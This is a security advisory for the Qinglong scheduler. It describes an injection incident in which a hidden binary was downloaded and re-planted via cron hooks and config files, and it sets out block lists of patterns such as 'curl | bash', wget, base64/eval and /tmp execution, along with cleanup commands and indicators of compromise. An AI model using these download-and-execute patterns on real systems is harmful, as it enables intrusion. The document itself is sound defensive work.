# Security Enhancements ## Overview This document describes the security enhancements implemented to prevent malicious code injection attacks in Qinglong. ## Issue Background A security vulnerability was discovered where malicious code could be injected into the system through: 1. Cron task fields (`task_before`, `task_after`, `command`) 2. Configuration file writes (`config.sh`, `extra.sh`, etc.) The reported incident involved a malicious script that: - Downloaded an external binary (`.fullgc`) from a suspicious domain - Executed the binary in the background - Persisted by continuously re-injecting itself ## Security Fixes Implemented ### 1. Input Validation for Cron Tasks **File:** `/back/validation/schedule.ts` Added comprehensive validation to detect and block dangerous shell patterns: - **Command Substitution**: Blocks `$(...)` and backtick patterns that could execute hidden commands - **File Downloads**: Blocks `curl`, `wget`, `fetch` commands - **External URLs**: Blocks HTTP/HTTPS URLs to prevent external resource downloads - **Hidden Files**: Blocks references to files starting with `.` (common in malware) - **Background Execution**: Blocks suspicious `nohup` patterns - **Output Hiding**: Blocks redirects to `/dev/null` combined with background execution - **Obfuscation**: Blocks `base64`, `decode`, `eval` patterns - **Temp Directory Execution**: Blocks execution from `/tmp` or hidden directories ### 2. Config File Content Security **File:** `/back/api/config.ts` Enhanced validation for configuration file content to prevent: - Downloads followed by execution (`curl | bash`, `wget | bash`) - Download and permission changes (`curl && chmod +x`) - Suspicious executable downloads (files like `.fullgc`) - Background execution of hidden files ### 3. Improved Shell Escaping **File:** `/back/services/cron.ts` Replaced weak shell escaping with a robust `escapeShellArg()` function that: - Properly escapes single quotes using `'\\''` pattern - Normalizes whitespace and newlines - Prevents command injection through various shell metacharacters ## Security Best Practices ### For Administrators 1. **Review Existing Tasks**: Audit all existing cron tasks for suspicious patterns 2. **Monitor Logs**: Check logs for security validation warnings 3. **Update Dependencies**: Keep all npm/pip dependencies up to date 4. **Limit Access**: Restrict who can create/modify cron tasks and config files 5. **Regular Backups**: Maintain backups of configuration files ### For Users 1. **Trusted Sources Only**: Only add scripts from trusted repositories 2. **Code Review**: Review any script before adding it to your cron tasks 3. **Avoid External URLs**: Don't include download commands in task hooks 4. **Report Suspicious Activity**: Report any unusual system behavior immediately ## Validation Error Messages When the security system blocks a pattern, you'll see error messages like: - `命令包含潜在危险的模式,已被安全系统拦截` - Command contains dangerous pattern - `前置命令包含潜在危险的模式,已被安全系统拦截` - task_before contains dangerous pattern - `后置命令包含潜在危险的模式,已被安全系统拦截` - task_after contains dangerous pattern - `配置文件内容包含潜在危险的模式,已被安全系统拦截` - Config file contains dangerous pattern ## What to Do If You're Affected If you've been affected by the malicious code injection: ### 1. Immediate Actions ```bash # Stop and remove the malicious process pkill -f ".fullgc" rm -f /ql/data/db/.fullgc # Check for the malicious code in configuration files grep -r "fullgc" /ql/data/config/ grep -r "551911.xyz" /ql/data/config/ ``` ### 2. Clean Configuration Files ```bash # Backup current configs cp -r /ql/data/config /ql/data/config.backup # Review and clean these files: # - /ql/data/config/config.sh # - /ql/data/config/extra.sh # - /ql/data/config/task_before.sh # - /ql/data/config/task_after.sh # Remove any lines containing: # - Downloads (curl, wget) # - External URLs # - .fullgc references ``` ### 3. Review Cron Tasks 1. Log into Qinglong admin panel 2. Check all cron tasks for suspicious content in: - Command field - task_before field - task_after field 3. Delete or clean any suspicious tasks ### 4. Update to Patched Version Ensure you're running a version of Qinglong with these security fixes. ### 5. Change Credentials If you suspect compromise: - Change your Qinglong admin password - Review and rotate any API tokens - Check for unauthorized access in logs ## Detection ### Log Analysis Security events are logged to help detect attempted attacks: ```bash # Check for security validation failures in logs grep "安全系统拦截" /ql/data/log/*.log # Check for suspicious file modifications grep "配置文件写入" /ql/data/log/*.log ``` ### File Integrity Regularly check for unexpected files: ```bash # Find hidden executables in data directory find /ql/data -type f -name ".*" -executable # Check for recently modified config files find /ql/data/config -type f -mtime -1 ``` ## Limitations These security measures provide defense-in-depth but are not foolproof: - Legitimate use cases requiring downloads must use alternative methods - Very sophisticated attacks may find bypasses - Users with admin access can still compromise the system - Compromised dependencies can still execute malicious code ## Reporting Security Issues If you discover a security vulnerability, please report it responsibly: 1. Do NOT create public GitHub issues for security vulnerabilities 2. Contact the maintainers privately 3. Provide detailed information about the vulnerability 4. Allow time for a patch before public disclosure ## References - [OWASP Command Injection](https://owasp.org/www-community/attacks/Command_Injection) - [Shell Command Injection Prevention](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)